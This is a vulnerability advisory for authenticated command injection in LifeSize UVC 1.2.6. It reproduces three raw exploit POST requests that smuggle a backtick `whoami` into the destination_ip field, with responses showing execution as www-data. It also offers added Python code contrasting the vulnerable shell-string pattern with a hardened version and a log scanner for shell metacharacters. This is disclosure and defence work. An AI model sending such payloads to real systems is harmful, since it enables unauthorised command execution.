Vendor: UVC
By: Anonymous
CVSS: 9.8 (HIGH)
Vulnerability Type: Remote Code Execution (RCE)
CWE: 78
Product Name: UVC
Affected Version From: 1.2.6
Affected Version To: 1.2.6
Patch Exists: YES
Related CWE: N/A
CPE: a:lifesize:uvc:1.2.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2020

LifeSize UVC 1.2.6 authenticated vulnerabilities

An authenticated user can execute arbitrary commands on a LifeSize UVC 1.2.6 system by sending a crafted POST request to the server-admin/operations/diagnose/ping/, server-admin/operations/diagnose/trace/ or server-admin/operations/diagnose/dns/ endpoint. The POST body carries a crafted destination_ip parameter (the raw requests reproduced below place the injected command in that field) whose value is passed unsanitised to the underlying diagnostic command, so a shell command embedded in it, here wrapped in backticks, is executed on the server. The command runs as the www-data user.
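The finding above is a textbook OS command injection (CWE-78): a hostname taken from a form field is spliced into a shell command line, so the shell expands the backticks before ping or dig ever sees the value. The following added example, written for this page and not LifeSize code, places that vulnerable pattern next to a hardened equivalent. The function names and the exact ping flags are assumptions; the parameter names (source_ip, destination_ip) are the advisory's.

```python
# Added example (not LifeSize code): the vulnerable string-building pattern behind
# the advisory's ping/trace/dns findings next to a hardened equivalent.
# Function names and ping flags are assumptions; parameter names follow the advisory.
import ipaddress
import re
import subprocess

# Allow-list for the destination: an RFC 1123 hostname (labels of letters, digits and
# hyphens with no leading/trailing hyphen, optional trailing dot) or a literal IP
# address. Anything else, including the backticks seen in the advisory, is rejected.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$){_LABEL}(?:\.{_LABEL})*\.?$")


def validate_destination(value: str) -> str:
    """Return value unchanged if it is a hostname or IP literal, else raise ValueError."""
    try:
        ipaddress.ip_address(value)
        return value
    except ValueError:
        pass
    if not _HOSTNAME_RE.match(value):
        raise ValueError(f"rejected destination: {value!r}")
    return value


def destination_is_valid(value: str) -> bool:
    """Boolean wrapper around validate_destination for callers that only need a verdict."""
    try:
        validate_destination(value)
        return True
    except ValueError:
        return False


def validate_source_ip(value: str) -> str:
    """source_ip is used as a bind address, so only a literal IP address is accepted."""
    return str(ipaddress.ip_address(value))


def build_ping_vulnerable(destination_ip: str, source_ip: str) -> str:
    """The pattern the advisory describes: untrusted input concatenated into a single
    shell string (typically then run via os.system or subprocess with shell=True).
    The shell performs command substitution on `whoami` before ping runs."""
    return f"ping -c 4 -I {source_ip} {destination_ip}"


def build_ping_hardened(destination_ip: str, source_ip: str) -> list:
    """Hardened form: validated values placed in an argv list. With shell=False the
    list reaches execve() as literal arguments, so no shell parses user text."""
    return ["ping", "-c", "4", "-I",
            validate_source_ip(source_ip), validate_destination(destination_ip)]


def run_diagnostic(argv: list, timeout: float = 10.0) -> str:
    """Execute an argv list produced by build_ping_hardened; never pass a string."""
    completed = subprocess.run(argv, shell=False, capture_output=True,
                               text=True, timeout=timeout)
    return completed.stdout + completed.stderr


if __name__ == "__main__":
    injected = "goo`whoami`gle.com"  # the destination value from the advisory's first request
    print("vulnerable command string:", build_ping_vulnerable(injected, "172.31.16.99"))
    try:
        build_ping_hardened(injected, "172.31.16.99")
    except ValueError as exc:
        print("hardened builder refused it:", exc)
    print("hardened argv:", build_ping_hardened("example.com", "172.31.16.99"))
```

The two defences are independent and both worth having: the allow-list stops the injected value at the input boundary, and the argv list means that even a value that slipped past validation would be handed to ping as one literal argument rather than interpreted by a shell.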

Mitigation:

Upgrade LifeSize UVC to a release later than 1.2.6.

Exploit-DB raw data:

LifeSize UVC 1.2.6 authenticated vulnerabilities
 
RCE as www-data:
 
POST /server-admin/operations/diagnose/ping/ HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.99/server-admin/operations/diagnose/ping/
Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
 
csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=goo`whoami`gle.com
 
The above POST results in a response containing:
<span class="red_txt">ping: unknown host goowww-datagle.com</span><br/>
 
RCE as www-data:
 
POST /server-admin/operations/diagnose/trace/ HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.99/server-admin/operations/diagnose/trace/
Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
 
csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com
 
Results in the following error:
gowww-dataogle.com: Name or service not known
 
RCE as www-data:
 
POST /server-admin/operations/diagnose/dns/ HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.99/server-admin/operations/diagnose/dns/
Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
 
csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com&query_type=ANY
 
Results in the following results:
; <<>> DiG 9.7.0-P1 <<>> -t ANY gowww-dataogle.com -b 172.31.16.99
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54663
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
 
;; QUESTION SECTION:
;gowww-dataogle.com. IN ANY
 
;; AUTHORITY SECTION:
com. 890 IN SOA a.gtld-servers.net. nstld.verisign-grs.com. 1395411948 1800 900 604800 86400
 
;; Query time: 21 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Fri Mar 21 10:26:21 2014
;; MSG SIZE rcvd: 109
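All three requests above share one signature: a POST to a diagnose endpoint whose hostname field contains shell metacharacters. The following added detection example (not part of the advisory) scans request-log lines for that pattern. The log format, timestamps and client address are constructed for the example; the endpoint paths and parameter names are the advisory's. Note that ordinary web-server access logs do not record POST bodies, so this assumes a reverse proxy or WAF log that does.

```python
# Added example (not from the advisory): flag diagnose-form submissions whose
# parameters carry shell metacharacters. The log line format is constructed;
# paths and parameter names come from the advisory.
import re
from urllib.parse import parse_qs

DIAGNOSE_PATHS = (
    "/server-admin/operations/diagnose/ping/",
    "/server-admin/operations/diagnose/trace/",
    "/server-admin/operations/diagnose/dns/",
)
WATCHED_PARAMS = ("source_ip", "destination_ip", "query_type")

# Characters that let a value escape a shell-built command line: command
# substitution, separators, pipes, redirects, grouping, quotes and whitespace.
_SHELL_META_RE = re.compile(r"[`$;&|<>(){}'\"\\\s]")

# Constructed log format: ISO timestamp, client, method, path, quoted body.
_LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<path>\S+) body="(?P<body>.*)"$'
)


def scan_line(line: str) -> list:
    """Return (path, param, value) findings for one log line; [] if nothing suspicious."""
    m = _LINE_RE.match(line)
    if not m or m["method"] != "POST" or m["path"] not in DIAGNOSE_PATHS:
        return []
    # parse_qs percent-decodes values, so encoded metacharacters are caught too.
    params = parse_qs(m["body"], keep_blank_values=True)
    findings = []
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if _SHELL_META_RE.search(value):
                findings.append((m["path"], name, value))
    return findings


def scan(lines) -> list:
    """Run scan_line over an iterable of log lines and flatten the findings."""
    return [finding for line in lines for finding in scan_line(line)]


# Constructed sample log: one benign ping, the advisory's ping and dns payloads,
# and a metacharacter in an unrelated form that must not be reported.
SAMPLE_LOG = [
    '2014-03-21T10:20:01Z 172.31.16.5 POST /server-admin/operations/diagnose/ping/ '
    'body="csrfmiddlewaretoken=TOKEN&source_ip=172.31.16.99&destination_ip=example.com"',
    '2014-03-21T10:22:14Z 172.31.16.5 POST /server-admin/operations/diagnose/ping/ '
    'body="csrfmiddlewaretoken=TOKEN&source_ip=172.31.16.99&destination_ip=goo`whoami`gle.com"',
    '2014-03-21T10:26:21Z 172.31.16.5 POST /server-admin/operations/diagnose/dns/ '
    'body="csrfmiddlewaretoken=TOKEN&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com&query_type=ANY"',
    '2014-03-21T10:30:00Z 172.31.16.5 POST /server-admin/login/ '
    'body="username=alice|bob&password=REDACTED"',
]

if __name__ == "__main__":
    for path, param, value in scan(SAMPLE_LOG):
        print(f"ALERT {path} {param}={value!r}")
```

A hit on destination_ip is high-confidence, since a legitimate hostname never contains these characters; a hit on query_type is equally telling because that field should only ever hold a record type such as ANY or A.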